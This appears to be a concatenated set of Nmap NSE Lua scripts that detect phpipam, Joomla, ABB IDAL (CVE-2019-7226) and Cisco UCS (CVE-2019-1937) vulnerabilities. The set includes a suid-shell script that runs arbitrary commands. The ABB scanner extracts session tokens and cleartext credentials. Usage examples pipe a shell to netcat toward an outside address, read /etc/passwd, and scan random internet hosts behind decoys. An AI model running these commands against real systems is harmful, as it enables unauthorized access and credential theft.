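local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/phpipam.html"



-- THE ACTION SECTION --
--- Fetch `uri` from host:port and report whether the page's <title> names one
-- of the phpipam versions this script targets (1.2.1 or 1.1.010, as listed in
-- the description block above).
-- NOTE(review): the file is named firefoxDOS.nse but its header, description
-- and sample output all describe phpipam.nse; it looks like a renamed copy.
-- The previous revision read the User-Agent back out of an empty header table
-- (always nil) and compared it with "Mozilla/5.0", so the VULNERABLE branch
-- could never run; it also dereferenced a nil response and concatenated a nil
-- title when the page was not phpipam. All three are fixed here.
-- @param host Nmap host table
-- @param port Nmap port table
-- @return a status string for Nmap output (never nil)
action = function(host, port)
  -- User-Agent from the `agent` script-arg; the @args block documents an
  -- iPhone/Safari default, so send that one when the arg is absent.
  local options = {header={}}
  options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
  local response = http.get(host, port, uri, options)

  -- http.get may come back without a usable status (connection failure).
  if ( not(response and response.status) ) then
    return "\n index: "..uri.."\n STATUS: no response from server\n module author: r00t-3xp10it\n\n"
  end

  local status = response.status

  -- check if target its phpipam based website
  if ( status == 200 ) then
    -- <title>phpipam <version></title>; "unknown" when the page is not phpipam.
    local title = response.body and string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>phpipam ([^<]*)") or "unknown"
    -- Affected versions named in the description block; plain (non-pattern)
    -- find so the dots are matched literally.
    local affected = string.find(title, "1.2.1", 1, true) or string.find(title, "1.1.010", 1, true)

    if ( affected ) then
      -- VULNERABLE nse module output display
      return "\n STATUS: VULNERABLE\n VERSION: "..title.." (likelly exploitable)\n Disclosure date: 28 set 2016\n Vuln discover: Saeed reza\n Module Author: r00t-3xp10it\n\n Description:\n phpipam is an open-source web IP address management application, its goal is to provide light\n modern and useful IP address management. It is php-based application with MySQL database backend,\n using jQuery libraries, ajax and some HTML5/CSS3 features.\n [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'\n [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit\n\n References:\n Vendor: http://phpipam.net/\n Vuln Discover: http://0day.today/exploit/25375\n Vuln Discover: https://www.exploit-db.com/exploits/39171/\n Module Author: https://sourceforge.net/u/peterubuntu10/profile/\n\n"
    else
      -- phpipam found, but not one of the versions listed as affected
      return "\n STATUS: NOT VULNERABLE\n index: "..uri..": 200 Found\n VERSION: "..title.." (wrong version)\n Module Author: r00t-3xp10it\n\n"
    end

  -- Any other status code: report it as NOT VULNERABLE with a short label.
  elseif ( status == 404 ) then
    return "\n index: "..uri.."\n STATUS: "..status.." NOT FOUND\n module author: r00t-3xp10it\n\n"
  elseif ( status == 400 ) then
    return "\n index: "..uri.."\n STATUS: "..status.." BAD REQUEST\n module author: r00t-3xp10it\n\n"
  elseif ( status == 401 ) then
    return "\n index: "..uri.."\n STATUS: "..status.." UNAUTHORIZED\n module author: r00t-3xp10it\n\n"
  elseif ( status == 302 ) then
    return "\n index: "..uri.."\n STATUS: "..status.." REDIRECTED\n module author: r00t-3xp10it\n\n"
  else
    -- Unlabelled code: just echo what the server returned.
    return "\n index: "..uri.."\n STATUS: "..status.." response code\n module author: r00t-3xp10it\n\n"
  end
end
--------------------------------------------------------------------------------
/Under Develop/joomla-3_4_5.nse:
--------------------------------------------------------------------------------
---
-- Port nmap nse script to: /usr/share/nmap/scripts
-- Update database: sudo nmap --script-updatedb
-- Usage: sudo nmap --script-help joomla-3_4_5.nse
-- Usage: sudo nmap -sV -Pn -p 80 --script joomla-3_4_5.nse
---


-- Dependencies (Lua libs)
local http = require('http')
local string = require('string')
local shortport = require('shortport')
local stdnse = require ('stdnse')
local vulns = require ('vulns')


description = [[

author: r00t-3xp10it
Detects for joomla 3.4.5 vulnerable applications

Some syntax examples:
nmap -sV -Pn -p 80 --script vuln
nmap -sV -Pn -p 80 --script joomla-3_4_5.nse
nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script joomla-3_4_5.nse -oN /root/nmap-report.log
]]

---
-- @usage
-- nmap --script-help ms15-034.nse
-- nmap -sV -Pn -p 80 --script vuln
-- nmap -sS -Pn -p 80 --script joomla-3_4_5.nse
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- |_joomla-3_4_5:
-- | State: VULNERABLE
-- | IDs: CVE-2015-1635
-- | Response: 416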
(exploitable) 40 | -- | Disclosure date: 2015-06-17 41 | -- | Author: r00t-3xp10it 42 | -- | 43 | -- | Description: 44 | -- | http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on 45 | -- | HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2, 46 | -- | Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. 47 | -- | Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit 48 | -- | Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd 49 | -- | 50 | -- | References: 51 | -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635 52 | -- | https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 53 | -- | http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd 54 | -- |_ 55 | -- @args joomla-3_4_5.uri URI to use in request. Default: / 56 | --- 57 | 58 | 59 | author = "r00t-3xp10it" 60 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 61 | categories = {"vuln"} 62 | -------------------------------------------------------------------------------- /Under Develop/suid-shell.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE suid-shell.nse - Version 1.4 3 | -- Copy nse to: /usr/share/nmap/scripts/suid-shell.nse 4 | -- Update db : sudo nmap --script-updatedb 5 | -- executing : nmap --script-help suid-shell.nse 6 | --- 7 | 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Author: Maky, r00t-3xp10it 13 | NSE script to spawn a root shell on SUID OR simple execute an remote system command. 
14 | This module accepts arguments like: User.command (system-command-to-execute-on-target) 15 | and: FakeUser.agent (The user-agent to send in header request -> Default: Macintosh,Firefox) 16 | 17 | Some Syntax examples: 18 | nmap --script-help suid-shell.nse 19 | nmap -sS -Pn -p 80 --script suid-shell.nse 20 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/bash" 21 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh -i" 22 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=cat /etc/passwd" 23 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh | nc 192.168.1.67 8080" 24 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 25 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=ls -a,agent=Mozilla/5.0 (compatible; EvilMonkey)" 26 | nmap -sV -Pn -T4 -iR 400 -p 80 --script suid-shell.nse --script-args "command=msfconsole -q -x 'use auxiliary/scanner/http/http_login; set RHOSTS 31.192.120.44; exploit'" 27 | 28 | ]] 29 | 30 | --- 31 | -- @usage 32 | -- nmap --script-help suid-shell.nse 33 | -- nmap -sS -Pn -p 80 --script suid-shell.nse 34 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/bash" 35 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh -i" 36 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=cat /etc/passwd" 37 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh | nc 192.168.1.67 8080" 38 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 39 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=ls -a,agent=Mozilla/5.0 (compatible; EvilMonkey)" 40 | -- nmap -sS -Pn -iR 400 -p 80 --script suid-shell.nse --script-args "command=msfconsole -q -x 'use auxiliary/scanner/http/http_login; set RHOSTS 31.192.120.44; exploit'" 41 | -- @output 42 
| -- PORT STATE SERVICE 43 | -- 80/tcp open http 44 | -- | suid-shell: 45 | -- | module author: r00t-3xp10it 46 | -- | user-agent : Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 47 | -- |_ sys-command: /bin/sh | nc 192.168.1.67 8080 48 | -- 49 | -- @args User.command -> The command to be executed -> Default: /bin/bash 50 | -- @args FakeUser.agent -> The User-agent to send in header request -> Default: Macintosh,Firefox 51 | --- 52 | 53 | author = "Maky, r00t-3xp10it" 54 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 55 | categories = {"intrusive", "discovery", "safe"} 56 | 57 | 58 | 59 | -- DEPENDENCIES (lua nse libraries) -- 60 | local os = require "os" 61 | local http = require "http" 62 | local stdnse = require ('stdnse') 63 | local shortport = require "shortport" 64 | 65 | 66 | -- THE RULE SECTION -- 67 | portrule = shortport.http 68 | local command = stdnse.get_script_args(SCRIPT_NAME..".command") or "/bin/bash" 69 | local agent_string = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5" 70 | -- Manipulate header requests with false info about attacker 71 | local options = {header={}} 72 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5" --> use Macintosh,firefox User-agent OR your own... 
options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language
options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it)


-- THE ACTION SECTION --
--- Run the `command` script-arg through os.execute and echo it in the report.
-- NOTE(review): despite the description, nothing in this body is sent to
-- host:port — the http.put call is commented out, and os.execute runs
-- `command` in a shell on the machine running Nmap (presumably once per
-- host/port the portrule matches). `command` is taken directly from
-- --script-args in the rule section above, with no validation.
-- The third parameter `options` shadows the module-level `options` header
-- table built above; the other scripts on this page declare action(host, port),
-- so it is presumably always nil here and is unused in any case.
-- @param host Nmap host table (unused)
-- @param port Nmap port table (unused)
-- @param options unused; shadows the module-level header table
-- @return report string echoing agent_string and command
action = function(host, port, options)
  -- local response = http.put(host, port, options, command)
  -- if response.status == 200 then
  -- return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n response : "..response.body.."\n"
  -- else
  -- return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n response : "..response.status.."\n"
  -- end
  -- execute system command (args) -- runs locally, on the scanning host
  os.execute(""..command.."")
  return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n"
end


--------------------------------------------------------------------------------
/abb-cve-2019-7226.nse:
--------------------------------------------------------------------------------
---
-- Nmap NSE abb-cve-2019-7226.nse - Version 1.10
-- Copy to: /usr/share/nmap/scripts/abb-cve-2019-7226.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help abb-cve-2019-7226.nse
-- Port(s) accepted by this nse: 80-86,8080-8086
---

-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it {Disclosure = Eldar Marcussen}
NSE script to detect if target [ip]:[port][/url] its affected by CVE-2019-7226 (Improper Authentication)
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication
and gain access to privileged functions.
Specifically, /cgi/loginDefaultUser creates a session in an authenticated state 16 | and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then 17 | supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service 18 | with /cgi/restart. 19 | 20 | Some Syntax examples: 21 | nmap --script-help abb-cve-2019-7226.nse 22 | nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194 23 | nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194 24 | nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194 25 | nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77 26 | nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3 27 | 28 | ]] 29 | 30 | --- 31 | -- @usage 32 | -- nmap --script-help abb-cve-2019-7226.nse 33 | -- nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194 34 | -- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194 35 | -- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194 36 | -- nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77 37 | -- nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3 38 | -- @output 39 | -- PORT STATE SERVICE VERSION 40 | -- 80/tcp open http Apache httpd 2.4.38 41 | -- | abb-cve-2019-7226: 42 | -- | VULNERABLE: 43 | -- | ABB IDAL HTTP server CGI (Improper Authentication) 44 | -- | State: 
VULNERABLE 45 | -- | IDs: CVE:CVE-2019-7226 46 | -- | Risk factor: Higth CVSSv2: 8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) 47 | -- | The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass 48 | -- | authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session 49 | -- | in an authenticated state and returns the session ID along with what may be the username and cleartext password 50 | -- | of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged 51 | -- | operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in 52 | -- | '1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response. 53 | -- | 54 | -- | Disclosure date: 2019-Fev-04 55 | -- | Exploit results: 56 | -- | Uri: http://192.168.1.71:80/cgi/loginDefaultUser 57 | -- | Auth-Cookie: IDALToken=008b1047k72068r6100a69b0381d007p 58 | -- | Credentials: admin : MyS3cr3t 59 | -- | 60 | -- | Referencies: 61 | -- | https://nvd.nist.gov/vuln/detail/CVE-2019-7226 62 | -- | https://www.akaoma.com/ressources/cve/gain-privilege/cve-2019-7226 63 | -- | https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html 64 | -- |_ 65 | -- @args verbose => Display More verbose outputs - Default: false 66 | -- @args User-Agent => User-Agent to send in requests - Default: iPhone,safari 67 | -- @args uri => the URL path to search in host.ip - Default: /cgi/loginDefaultUser 68 | --- 69 | 70 | 71 | author = "r00t-3xp10it" 72 | copyright = "Eldar Marcussen" 73 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 74 | categories = {"safe", "vuln"} 75 | 76 | 77 | -- DEPENDENCIES (lua nse libs) -- 78 | local http = require "http" 79 | local table = require "table" 80 | local vulns = require "vulns" 81 | local string = require "string" 82 | local stdnse = 
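require "stdnse" --> nse args usage
local shortport = require "shortport"


-- THE RULE SECTION --
-- Scan only the selected ports/proto/service_names in 'open state'
portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, "http, http-simple-new, http-proxy", "tcp", "open")


-- THE ACTION SECTION --
--- Check host:port for CVE-2019-7226 (ABB IDAL HTTP server: the
-- loginDefaultUser CGI hands out an authenticated session without login).
-- One GET is sent to `uri`; the host is reported VULNERABLE only when the
-- status is one of 200/401/403/405/500 AND the body carries an "IDALToken="
-- value. Every other outcome is NOT VULNERABLE and is explained only when the
-- `verbose` script-arg is "true".
-- Fixes relative to the previous revision: `uri_found` and `index` were
-- accidental globals; `not(response or response.status)` only fired for a nil
-- response; a body with fewer than three tokens indexed tbl[3] (nil) and
-- crashed; server-supplied strings were used as a string.format format string
-- (a '%' in the token would raise "invalid option"); and a nil response
-- reached `response.status`/`response.body` in the final checks.
-- @param host Nmap host table (host.ip is used in messages)
-- @param port Nmap port table (port.number is used in messages)
-- @return vulns report when vulnerable, an explanatory string when verbose is
--   "true", otherwise nil
action = function(host, port)
  local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false"
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/cgi/loginDefaultUser"


  -- Request headers: User-Agent from the script-arg, else the fixed default.
  local _decoy = {header={}}
  _decoy['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
  _decoy['header']['Accept-Language'] = "en-GB,en;q=0.8,sv"
  _decoy['header']['Cache-Control'] = "no-store" --> ask the server not to cache the request


  -- Identify servers that answer [200] to invalid HTTP requests
  -- and exit (abort exec) as these would invalidate the tests.
  local status_404, result_404, _ = http.identify_404(host, port)
  if ( status_404 and result_404 == 200 ) then
    print("CVE-2019-7226:\n| Exiting: "..host.ip..":"..port.number..uri.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_")
    return nil
  end


  -- [001] The uri must answer (no redirect following, no cache) with one of the
  -- accepted status codes before host.ip can be classified as vulnerable.
  local response = http.get(host, port, uri, _decoy, { redirect_ok = false, no_cache = true, no_cache_body = true })
  local status = response and response.status or nil
  local body = response and response.body or nil
  local uri_found = "false"
  if ( status == 200 or status == 401 or status == 403 or status == 405 or status == 500 ) then
    uri_found = "true"
  end


  -- [002] The body must leak the session cookie ("IDALToken=...").
  -- Expected shape: '1 #S_OK IDALToken=<token> <user> <pass>' (five tokens,
  -- cookie in slot 3); anything else yields the error placeholders instead of
  -- indexing a slot that does not exist.
  local auth_stats = "false"
  local cookie_value, capt_creds
  if ( body ) then
    if ( string.find(body, "IDALToken=", 1, true) ) then
      auth_stats = "true"
      -- split response.body on whitespace into tbl[1..n]
      local tbl = {}
      for token in string.gmatch(body, "[^%s]+") do
        tbl[#tbl + 1] = token
      end
      local slot3_has_token = ( #tbl >= 3 and string.find(tbl[3], "IDALToken=", 1, true) ~= nil )
      if ( #tbl == 5 and slot3_has_token ) then
        cookie_value = tbl[3]
        capt_creds = tbl[4].." : "..tbl[5]
      elseif ( #tbl < 5 and slot3_has_token ) then
        cookie_value = tbl[3]
        capt_creds = "error retrieving table index's"
      else
        cookie_value = "error retriving table index's"
        capt_creds = "error retrieving table index's"
      end
    elseif ( string.find(body, "#E_NEED_LOGIN", 1, true) ) then
      auth_stats = "Authentication required"
    elseif ( status == 401 or status == 403 ) then
      auth_stats = "Unauthorized/Forbidden"
    end
  end


  -- Build Nmap vulnerable {table}
  local vuln_table = {
    title = "ABB IDAL HTTP server CGI (Improper Authentication)",
    state = vulns.STATE.NOT_VULN,
    IDS = {CVE = 'CVE-2019-7226'},
    risk_factor = "High",
    scores = {
      CVSSv2 = "8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
    },
    description = [[
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass
authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session
in an authenticated state and returns the session ID along with what may be the username and cleartext password
of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged
operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in
'1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response.
]],
    references = {
      'https://nvd.nist.gov/vuln/detail/CVE-2019-7226',
      'https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html',
    },
    dates = {
      disclosure = {year = '2019', month = 'Fev', day = '04'},
    },
    exploit_results = {}, --> Display auth cookie and creds
  }


  -- Build vulnerable stdout (Display auth cookie and creds).
  -- Plain concatenation only: cookie_value/capt_creds come from the server and
  -- must never be used as a string.format format string.
  if ( uri_found == "true" and auth_stats == "true" ) then
    table.insert(vuln_table.exploit_results, "Uri: http://"..host.ip..":"..port.number..uri)
    table.insert(vuln_table.exploit_results, "Auth-Cookie: "..cookie_value)
    table.insert(vuln_table.exploit_results, "Credentials: "..capt_creds.."\n")
  end


  -- Final checks (uri_found|auth_stats); `status` may be nil, hence tostring.
  if ( uri_found == "false" and verbose == "true" ) then
    return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: [404] Uri Not Found in Response\n\n"
  elseif ( auth_stats == "false" and verbose == "true" ) then
    return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..tostring(status).."] Auth Cookie Not found\n\n"
  elseif ( auth_stats == "Unauthorized/Forbidden" and verbose == "true" ) then
    return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..tostring(status).."] Unauthorized/Forbidden\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..body.."\n\n"
  elseif ( auth_stats == "Authentication required" and verbose == "true" ) then
    return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..tostring(status).."] Authentication required\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..body.."\n\n"
  elseif ( not body ) then
    -- No body at all (or no response): only worth reporting in verbose mode.
    if ( verbose == "true" ) then return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..tostring(status).."] None response.body returned\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n" end
  elseif ( uri_found == "true" and auth_stats == "true" ) then
    -- Both [001] and [002] succeeded: emit the Nmap vulnerability report.
    vuln_table.state = vulns.STATE.VULN
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
    return report:make_output(vuln_table)
  end
end
--------------------------------------------------------------------------------
/cisco-cve-2019-1937.nse:
--------------------------------------------------------------------------------
---
-- Nmap NSE cisco-cve-2019-1937.nse - Version 1.12
-- Affected versions: Cisco UCS Director 6.6.0 <=> 6.7.0
-- Copy to: /usr/share/nmap/scripts/cisco-cve-2019-1937.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help cisco-cve-2019-1937.nse
-- Port(s) accepted by this nse: 80,443
---

-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it {Disclosure = Pedro Ribeiro}
A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor,
Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker
to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability
is due to insufficient request header validation during the authentication process. An attacker could exploit this
vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker
to use the acquired session token to gain full administrator access to the affected device.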
20 | 21 | Some Syntax examples: 22 | nmap --script-help cisco-cve-2019-1937.nse 23 | nmap -sV -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse 212.40.68.127 24 | nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" 212.40.68.127 25 | nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71,verbose=true" 136.186.1.214 26 | nmap -sS -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "force_cookie=true,verbose=true" 136.186.1.214 27 | nmap -sS -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "User-Agent=Apache-HttpClient/4.0.3" 136.186.1.214 28 | nmap -sS -Pn -n -v -T4 -iR 750 -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" -D 172.217.168.174 29 | 30 | ]] 31 | 32 | --- 33 | -- @usage 34 | -- nmap --script-help cisco-cve-2019-1937.nse 35 | -- nmap -sV -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse 212.40.68.127 36 | -- nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" 212.40.68.127 37 | -- nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71,verbose=true" 136.186.1.214 38 | -- nmap -sS -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "force_cookie=true,verbose=true" 136.186.1.214 39 | -- nmap -sS -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "User-Agent=Apache-HttpClient/4.0.3" 136.186.1.214 40 | -- nmap -sS -Pn -n -v -T4 -iR 750 -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" -D 172.217.168.174 41 | -- @output 42 | -- PORT STATE SERVICE 43 | -- 443/tcp open https 44 | -- | cisco-cve-2019-1937: 45 | -- | VULNERABLE: 46 | -- | Cisco UCS Supervisor (Web Interface Auth Bypass) 47 | -- | State: VULNERABLE 48 | -- | IDs: CVE:CVE-2019-1937 49 | -- | Risk factor: Critical CVSSv2: 10.0 CRITICAL 
(AV:N/AC:L/Au:N/C:C/I:C/A:C) 50 | -- | A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, 51 | -- | Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker 52 | -- | to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability 53 | -- | is due to insufficient request header validation during the authentication process. An attacker could exploit this 54 | -- | vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker 55 | -- | to use the acquired session token to gain full administrator access to the affected device. 56 | -- | 57 | -- | Disclosure date: 2019-Ago-21 58 | -- | Exploit results: 59 | -- | Attack Vector: Remote 60 | -- | Uri: https://192.168.1.71:443/app/ui/ClientServlet?apiName=GetUserInfo 61 | -- | Auth-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74; 62 | -- | 63 | -- | Referencies: 64 | -- | https://nvd.nist.gov/vuln/detail/CVE-2019-1937 65 | -- | https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby 66 | -- | https://packetstormsecurity.com/files/154239/Cisco-UCS-IMC-Supervisor-Authentication-Bypass-Command-Injection.html 67 | -- |_ 68 | -- @args verbose => Display verbose Error(s) outputs - Default: false 69 | -- @args uri => the Full URL to send in GET requests - Default: /app/ui/ClientServlet?apiName=GetUserInfo 70 | -- @args User-Agent => User-Agent to send in requests - Default: Android; Mobile; Firefox 45.0 71 | -- @args force_cookie => bypass cookie name checks - Default: false 72 | -- @args lhost => Manually set your internal ip addr - Default: nil (auto-seach) 73 | -- Manual Input: nmap -sV -p 80 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71" 74 | --- 75 | 76 | author = "r00t-3xp10it" 77 | copyright = 
"Pedro Ribeiro" 78 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 79 | categories = {"safe", "vuln"} 80 | 81 | 82 | -- DEPENDENCIES (lua nse libs) -- 83 | local http = require "http" 84 | local table = require "table" 85 | local vulns = require "vulns" 86 | local string = require "string" 87 | local stdnse = require "stdnse" --> nse args usage 88 | local shortport = require "shortport" 89 | 90 | 91 | -- THE RULE SECTION -- 92 | -- Scan only the selected ports/proto/service_names in 'open state' 93 | portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open") 94 | 95 | 96 | -- THE ACTION SECTION -- 97 | action = function(host, port) 98 | local decoy_agent = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (Android; Mobile; rv:40.0) Gecko/40.0 Firefox/45.0" 99 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/app/ui/ClientServlet?apiName=GetUserInfo" 100 | local force_cookie = stdnse.get_script_args(SCRIPT_NAME..".force_cookie") or "false" 101 | local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false" 102 | local ip_addr = stdnse.get_script_args(SCRIPT_NAME..".lhost") or nil 103 | local http_err,cookie_err,parse_cookie = "nil","nil","nil" 104 | local uri_stats,cookie_stats,vuln_test = nil,nil,nil 105 | 106 | 107 | if ( ip_addr == nil ) then 108 | -- Capture (Local) distro flavor { Windows | Linux } 109 | local socket = io.popen("ver 2>&1") --> supress io.popen() stdout error msg (2>&1) 110 | flavor = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from OS flavor 111 | socket.close() 112 | if ( flavor == nil or flavor == "" or string.find(flavor, "not found")) then 113 | local socket = io.popen("uname -s") 114 | flavor = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from OS flavor 115 | socket.close() 116 | end 117 | 118 | if (string.find(flavor, "[Ll]inux")) then 119 | -- Executing BASH command(s) and store results 120 | -- Storing network interface in use { wlan0 | 
